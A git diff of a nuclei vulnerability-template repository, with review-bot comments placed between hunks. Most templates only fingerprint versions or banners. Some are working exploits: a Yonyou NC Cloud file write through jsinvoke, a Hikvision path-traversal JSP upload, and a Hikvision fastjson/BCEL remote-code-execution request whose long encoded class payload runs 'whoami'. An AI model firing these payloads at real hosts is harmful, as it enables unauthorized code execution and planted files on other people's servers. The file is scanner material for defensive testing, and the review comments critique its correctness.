diff --git a/date.txt b/date.txt
index 42eedaf32c..18af8d7e28 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20240901
+20240902
diff --git a/poc.txt b/poc.txt
index 9a8a68cc29..2f04f118f1 100644
--- a/poc.txt
+++ b/poc.txt
@@ -40929,6 +40929,7 @@
 ./poc/cve/CVE-2024-5041-683fbe7656aac22ccbf1456af0532a73.yaml
 ./poc/cve/CVE-2024-5041.yaml
 ./poc/cve/CVE-2024-5053-efd2b0e65d76d17f35c9856f865d744c.yaml
+./poc/cve/CVE-2024-5053.yaml
 ./poc/cve/CVE-2024-5057-b5cd1f63e71feb762d09590f74da1942.yaml
 ./poc/cve/CVE-2024-5057.yaml
 ./poc/cve/CVE-2024-5058-63a03ea4af4d1f6d04449e3cd1d991f1.yaml
diff --git a/poc/cve/CVE-2024-5053.yaml b/poc/cve/CVE-2024-5053.yaml
new file mode 100644
index 0000000000..e931361d8d
--- /dev/null
+++ b/poc/cve/CVE-2024-5053.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-5053 + +info: + name: > + Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.1.18 - Missing Authorization to Authenticated (Subscriber+) Mailchimp Integration Modification + author: topscoder + severity: low + description: > + The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to unauthorized Malichimp API key update due to an insufficient capability check on the verifyRequest function in all versions up to, and including, 5.1.18. This makes it possible for Form Managers with a Subscriber-level access and above to modify the Mailchimp API key used for integration. At the same time, missing Mailchimp API key validation allows the redirect of the integration requests to the attacker-controlled server. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8242e0f0-b9c5-46fe-b691-3275cd0f9a43?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 4.2 + cve-id: CVE-2024-5053 + metadata: + fofa-query: "wp-content/plugins/fluentform/" + google-query: inurl:"/wp-content/plugins/fluentform/" + shodan-query: 'vuln:CVE-2024-5053' + tags: cve,wordpress,wp-plugin,fluentform,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fluentform" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.1.18') \ No newline at end of file 
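Review bot: The template decides solely on the `Stable tag` parsed out of readme.txt via `compare_versions(version, '<= 5.1.18')`, so a hit means a vulnerable-looking version string is published, not that the missing capability check was observed; readme.txt can lag the installed code or survive plugin deactivation, and `description` should say the result is version inference so operators triage it as such. The two extractors both named `version` (one `internal: true`) seem to exist only so the value is both usable in the DSL and surfaced in output — a one-line comment saying so would stop the next maintainer from deduplicating them. `description` spells `Malichimp` for `Mailchimp`, and the file ends without a trailing newline. `severity: low` sits beside `cvss-score: 4.2`, which falls in the CVSS v3 medium band — confirm which one the source advisory intended.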
diff --git a/poc/cve/cve-2001-1473.yaml b/poc/cve/cve-2001-1473.yaml index 80480efb7b..d7ad14a2d1 100644 --- a/poc/cve/cve-2001-1473.yaml +++ b/poc/cve/cve-2001-1473.yaml @@ -1,11 +1,11 @@ id: CVE-2001-1473 - info: name: Deprecated SSHv1 Protocol Detection author: iamthefrogy severity: high - + tags: cve,cve2001,network,ssh,openssh description: SSHv1 is deprecated and has known cryptographic issues. + remediation: Upgrade to SSH 2.4 or later. reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 @@ -14,13 +14,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N cve-id: CVE-2001-1473 cwe-id: CWE-310 - network: - host: - "{{Hostname}}" - "{{Host}}:22" - matchers: - type: word words: - "SSH-1" + +# Updated by Chris on 2022/01/21 diff --git a/poc/cve/cve-2015-5354.yaml b/poc/cve/cve-2015-5354.yaml index f20d2dfa3f..20062f876d 100644 --- a/poc/cve/cve-2015-5354.yaml +++ b/poc/cve/cve-2015-5354.yaml 
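Review bot: The added `remediation: Upgrade to SSH 2.4 or later.` does not match the finding: the check detects SSH protocol version 1 in the banner, and "2.4" is neither a protocol version nor an obviously identifiable server release, so the advice is hard to act on. Something like `remediation: Disable SSH protocol version 1 and serve only SSH-2 (OpenSSH: do not enable Protocol 1).` would be actionable — confirm the intended wording against the source. The word matcher `- "SSH-1"` in the second hunk also fires on `SSH-1.99-` banners, which advertise support for both protocol versions; that is a correct positive, but the description could state it so reviewers do not read those hits as false positives.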
@@ -1,31 +1,26 @@ id: CVE-2015-5354 - info: name: Novius OS 5.0.1-elche - Open Redirect author: 0x_Akoko severity: medium - description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login. + description: Open redirect vulnerability in Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login. reference: - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html - https://vuldb.com/?id.76181 + - https://nvd.nist.gov/vuln/detail/CVE-2015-5354 - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html - - https://nvd.nist.gov/vul n/detail/CVE-2015-5354 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2015-5354 cwe-id: CWE-601 - tags: packetstorm,cve,cve2015,redirect,novius - + tags: cve,cve2015,redirect,novius requests: - method: GET path: - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh' - matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by mp on 2022/07/22 diff --git a/poc/cve/cve-2016-6210.yaml b/poc/cve/cve-2016-6210.yaml index 0cf11fcf80..668fd715ec 100644 --- a/poc/cve/cve-2016-6210.yaml +++ b/poc/cve/cve-2016-6210.yaml @@ -1,9 +1,10 @@ id: CVE-2016-6210 + info: name: OpenSSH username enumeration < v7.3 author: iamthefrogy,forgedhallpass severity: medium - tags: cve,cve2016,network,openssh + description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 
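Review bot: The file still uses the legacy `requests:` key even though the commit reworks every other part of it; the other templates on this page use `http:`, which is the key current nuclei releases document, so if the repository targets a recent nuclei this file needs the same migration — confirm the supported version. The `Location` regex is documented only by the `# https://regex101.com/r/ZDYhFh/1` link; a short comment such as `# matches Location pointing at interact.sh, including scheme-relative (//) and backslash-prefixed forms` would let a reviewer verify intent without leaving the file. Removing the `# Enhanced by mp on 2022/07/22` trailer drops provenance without an equivalent record elsewhere, which is fine only if the repository does not track it in-file.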
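Review bot: The new `description:` says OpenSSH before 7.3 "is vulnerable to username enumeration and DoS vulnerabilities", but this CVE covers only the timing-based username enumeration; the password-length DoS fixed in the same release is tracked under a separate CVE, so the text over-claims what a hit means. Suggest `description: OpenSSH before 7.3 allows remote attackers to enumerate valid usernames via a timing difference in password authentication.` The rest of `info` and the reference list continue outside this hunk.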
@@ -15,15 +16,18 @@ info: cvss-score: 5.9 cve-id: CVE-2016-6210 cwe-id: CWE-200 + network: - host: - "{{Hostname}}" - "{{Host}}:22" + matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' + extractors: - type: regex regex: - - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' + - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' \ No newline at end of file diff --git a/poc/cve/cve-2018-1271.yaml b/poc/cve/cve-2018-1271.yaml index 548327e206..ccf03eab13 100644 --- a/poc/cve/cve-2018-1271.yaml +++ b/poc/cve/cve-2018-1271.yaml 
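Review bot: The 7.x alternative of the version regex, `7\.[0-2][^\d][\n^\r]+`, looks like a typo for `[^\r\n]+`: as written the class contains only a newline, a literal caret and a carriage return, so a banner such as `SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8` (constructed example) can never satisfy that branch and 7.0–7.2 servers are silently reported as not affected. The `[1-6]` branch is unaffected, so the miss is limited to the last three vulnerable minor versions. The commit also strips the file's trailing newline (`\ No newline at end of file`), which the sibling templates keep.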
@@ -1,20 +1,18 @@ id: CVE-2018-1271 + info: name: Spring MVC Directory Traversal Vulnerability author: hetroublemakr severity: medium - description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. - reference: - - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d - - https://pivotal.io/security/cve-2018-1271 - - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699 - - https://access.redhat.com/errata/RHSA-2018:1320 + reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d + classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.9 + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.90 cve-id: CVE-2018-1271 cwe-id: CWE-22 - tags: cve,cve2018,spring,lfi,traversal + description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack." + requests: - method: GET path: diff --git a/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml b/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml index 653783158e..cef49f23fa 100644 --- a/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml 
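Review bot: The commit drops `tags: cve,cve2018,spring,lfi,traversal` without replacement, so the template no longer participates in tag-based selection and falls out of the cve/spring groupings the rest of this repository uses; keep `tags:` alongside the relocated `description:`. The `reference:` list is collapsed to a single blog link, discarding the vendor advisory and the RHSA entry a defender would use to confirm fixed versions, and `cvss-metrics` moves from `CVSS:3.1` to `CVSS:3.0` with `cvss-score: 5.90` — the trailing zero parses as 5.9 but reads as a transcription slip. Unless these were deliberate corrections from the source advisory, restoring the original four references and the 3.1 vector looks right.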
+++ b/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml @@ -1,43 +1,36 @@ id: yonyou-nc-cloud-jsinvoke-rce info: - name: Yonyou NC Cloud - Remote Code Execution - author: Co5mos + name: yonyou-nc-cloud-jsinvoke-rce + author: pphua severity: critical - description: An arbitrary file upload vulnerability in the Yonyou NC-Cloud system. Attackers can upload any files to the server and upload web shells, thereby gaining command execution privileges on the server. - reference: - - https://mp.weixin.qq.com/s/qL5LurGfuShf1emJuay2_Q + tags: yonyou,nc-cloud,rce + reference: + - https://mp.weixin.qq.com/s/-2fNt7rBj6j2inEmqIaoUA metadata: max-request: 2 verified: true fofa-query: app="用友-NC-Cloud" - tags: yonyou,rce - -variables: - str1: "{{rand_base(5)}}.txt" http: - raw: - - | + - | POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip - {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["{{md5('yonyou-nc-cloud-jsinvoke-rce')}}","webapps/nc_web/{{str1}}"]} - + {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["StringObject","webapps/nc_web/{{randstr}}.txt"]} + - | - GET /{{str1}} HTTP/1.1 - Host: {{Hostname}} + GET /{{randstr}}.txt HTTP/1.1 + Content-Length: 138 + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - matchers-condition: and matchers: - type: word - part: body words: - - '5d8be7535d6383e99315739724e10fa7' - - - type: status - status: - - 200 \ No newline at end of file + - "StringObject" + part: body \ No newline at end of file 
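Review bot: The second raw request, `GET /{{randstr}}.txt HTTP/1.1`, has lost its `Host:` header but gained `Content-Length: 138` with no body, which is malformed HTTP/1.1 and can leave a server waiting for a body that never arrives; a bodiless GET should not declare a length. The change also replaces the human-readable `name:` with the template id and deletes `description:`, so a report no longer tells an operator what was found or that the check leaves a `.txt` file under `webapps/nc_web/` on the target — a sentence in `description` naming that artifact would help cleanup. The same edits appear in `poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml` further down this page.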
diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml index cd961f6e81..e86e8491d1 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml 
@@ -1,27 +1,40 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /svm/api/external/report HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 
'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' + condition: and diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload.yaml index 7e328a8b1b..0ebd67934b 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload.yaml 
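Review bot: The template writes `test.jsp` into a fixed webapp directory and never removes it, so every positive scan leaves an executable artifact on the target; `description` should state this so operators know what to clean up. The DSL matcher relies on `contains(body_1, "data")` and `contains(body_2, "test")`, both generic words that occur in many JSON error bodies and default pages, so a target that answers 200 for arbitrary paths can match without any upload having happened — the first condition in particular should confirm an upload-success response rather than a substring. `id: HiKVISION` differs from the `HIKVISION` id of the two sibling templates only by case and is not unique in any case; nuclei expects one id per template. The file is added a second time under `poc/upload/` at the end of this page.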
@@ -1,50 +1,27 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' - http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" - Content-Type: image/jpeg - - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- - - - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: name - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - type: word words: - - '{{randstr}}' + - "nt authority\\system" diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml index 7e328a8b1b..7f081b05e0 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml 
